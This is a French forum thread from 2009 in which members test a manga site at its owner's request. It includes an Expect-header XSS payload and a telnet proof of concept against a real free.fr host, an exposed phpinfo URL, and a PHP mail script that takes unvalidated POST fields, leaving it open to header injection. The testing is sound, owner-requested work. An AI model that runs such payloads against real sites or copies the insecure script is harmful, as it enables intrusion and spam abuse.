Les failles de planète mangas

Nos experts testeront vos sites avec attention.
Postez ici vos liens. Et fournissez les accès de bases (login et mot de passe 'simple utilisateur' par exemple si vous souhaitez voir ce qu'un utilisateur peux exploiter)

Moderators: Mod, Mod, Mod

Postby OUILLE » Thu Jul 02, 2009 10:27 am

[b:fe8f43b10a]Je viens de changer toute la structure du site, ou presque.
Pourriez vous retester s'il vous plaiiiit ? :o[/b:fe8f43b10a]
(le forum n'a pas changé)
User avatar
OUILLE
Projets
 
Posts: 16
Joined: Mon Jun 08, 2009 8:01 pm

Postby LECHIENKITU » Wed Jul 08, 2009 4:55 pm

J'enleves mon ancien message COMPLETEMENT INUTILE !
Last edited by LECHIENKITU on Sat Jul 25, 2009 11:04 pm, edited 1 time in total.
LECHIENKITU
Projets
 
Posts: 177
Joined: Wed Apr 01, 2009 4:12 am

Postby TorTukiTu » Wed Jul 08, 2009 10:14 pm

Je n'ai plus repéré de failles évidentes.

J'ai testé tes formulaires, boutons et url avec plusieurs types d'injections SQL.
J'ai testé tout ce qui pouvaît être potentiellement utilisable (à ma conaîsance) pour faire du XSS.
J'ai testé ton script d'upload d'avatar en essayant de bidouiller le nom du fichier ou en injectant du code dans l'en tête de l'image.
Ras pour tes cookies.
Pas d'includes foireuses.
Pas d'accès possibles aux fichiers sensibles.

J'ai peut-être raté des trucs, mais ça a l'air ok cette fois-ci =)

Depuis qu'on t'a aidé à corriger tes failles, tu as eu d'autres soucis de piratage? Tu as bien vérifié si le mec n'avait pas laissé de backdoor?

La tortue.
User avatar
TorTukiTu
Site Admin
 
Posts: 1960
Joined: Thu Feb 07, 2008 10:24 pm
Location: Devant son pc durant la redaction de ce message

Postby jeyy » Thu Jul 09, 2009 9:36 am

bonjour.


juste pour info ; j'utilise joomla sur free et quand un utilisateur s'inscrit un mail lui est envoyé en guise de vérif , testé sur hotmail et ça marche aussi.

juste pour autre info ; je me sert d'un script php sur un serveur free , qui me sert a envoyer des mails et ça vers toutes boite mail dont celle hotmail .






[b:1d2f6fe2f1]index.html[/b:1d2f6fe2f1]
[quote:1d2f6fe2f1]<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head></head>
<body><form action="mail.php" method="post">
<p>
</p><p>
<label for="from">exped :</label>
<input id="from" name="from">
</p>
<p>
<label for="to">adress :</label>
<input id="to" name="to" type="text">
</p>

<p>
<label for="sujet">Sujet :</label>
<input id="sujet" name="sujet" type="text">
</p>
<p>
<label for="message">Message :</label>
<textarea id="message" name="message" cols="60" rows="6"></textarea>
</p>
<p>
<input name="envoye" value="Envoyer" type="submit">
</p>
</form>
</body></html>[/quote:1d2f6fe2f1]

[b:1d2f6fe2f1]mail.php[/b:1d2f6fe2f1]
[quote:1d2f6fe2f1]<?php
{
$expediteur = $_POST['from'];
$sujet = $_POST['sujet'];
$message = $_POST['message'];
$mail = $HTTP_POST_VARS['to'];
}

/* Destinataire (votre adresse e-mail) */
$to = $mail ;

/* Construction du message */
$msg = 'Bonjour,'."\r\n\r\n";
$msg .= '***************************'."\r\n";
$msg .= $message."\r\n";
$msg .= '***************************'."\r\n";


/* En-têtes de l'e-mail */
$headers = 'From: '.$nom.' <'.$expediteur.'>'."\r\n\r\n";

/* Envoi de l'e-mail */
mail($to, $sujet, $msg, $headers);

if (mail($expediteur,$sujet,$message,$mail)) {
echo "Votre mail a ete envoye";
} else {
echo "Une erreur s'est produite";
}

?>[/quote:1d2f6fe2f1]

reste plus qu'a trouver le script qui te conviens.
User avatar
jeyy
Projets
 
Posts: 113
Joined: Tue Mar 25, 2008 11:20 am

Postby nqqb » Sat Jul 25, 2009 6:38 pm

je suis arrivé à me faire bannir -_- en allant sur ban.php :?
User avatar
nqqb
Projets
 
Posts: 222
Joined: Fri Jun 13, 2008 1:15 pm

Postby OUILLE » Sat Jul 25, 2009 11:04 pm

nqqb: c'est un ban temporaire destiné à empêcher les gens d'aspirer le site...
User avatar
OUILLE
Projets
 
Posts: 16
Joined: Mon Jun 08, 2009 8:01 pm

Postby SPLEENKIRBY » Thu Sep 03, 2009 2:26 am

Salut.

Ton site est vulnérable aux failles xss via l'expect header.
Ainsi, une requête HTTP de ce type pointé vers ton serveur renverra un alert dans un navigateur :

[code:1:e9b40660d4]GET / HTTP/1.1
Accept: */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Expect: <script>alert("Expect header vulnérable");</script>
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1
.4322)
Host: perso101-g5.free.fr
Connection: Keep-Alive
[/code:1:e9b40660d4]

Cette faille n'est pas moindre, le XSS encore moins, donc attention. Même si cette vulnérabilité est souvent taguée d'un "low risk", elle est très facilement exploitable si tu autorise du contenu flash sur ton site.

Soit dit en passant, cette faille est présente sur beaucoup d'espaces perso free.

PoC :

[quote:e9b40660d4]
bt Desktop # telnet 212.27.63.101 80
Trying 212.27.63.101...
Connected to 212.27.63.101.
Escape character is '^]'.

GET / HTTP/1.1
Accept: */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Expect: <script>alert('Hello world!');</script>
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR
.4322)
Host: perso101-g5.free.fr
Connection: Keep-Alive


HTTP/1.1 417 Expectation Failed
Date: Thu, 03 Sep 2009 01:30:45 GMT
Server: Apache/ProXad [Aug 9 2008 02:45:09]
Connection: close
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field could not be met by this server.<P>
The client sent<PRE>
[b:e9b40660d4]Expect: <script>alert('Hello world!');</script>[/b:e9b40660d4]
</PRE>
but we only allow the 100-continue expectation.
<ADDRESS>Apache/ProXad [Aug 9 2008 02:45:07] Server at perso101-g5.free.fr Port 80</ADDRESS>
</BODY></HTML>
Connection closed by foreign host.

[/quote:e9b40660d4]

[url=hxxp://www.google.fr/#q=expect+header+vulnerability]expect header vulnerability[/url] sur Google te donnera plus d'amples informations sur cette vulnérabilité.


De plus, ton phpinfo() est parfaitement visible à tous ici :
hxxp://perso101-g5.free.fr/info.php

Mis à part cela, je fais confiance à TorTukiTu pour le reste des injections SQL ou autre failles php, je n'ai pas trop regardé. (ah, si, je suis tombé sur la page "pirate?" :P)
User avatar
SPLEENKIRBY
Projets
 
Posts: 63
Joined: Wed Sep 02, 2009 10:13 pm
Location: \x44\x54\x43\

Postby OUILLE » Tue Oct 27, 2009 8:46 am

wahoo, merci, et désolé de l'énoooorme retard !
Mais bon ça c'est des problèmes que je peux pas corriger...
User avatar
OUILLE
Projets
 
Posts: 16
Joined: Mon Jun 08, 2009 8:01 pm

Previous

Return to Faites tester vos sites <b>DE TEST</b>

Who is online

Users browsing this forum: No registered users and 0 guests

cron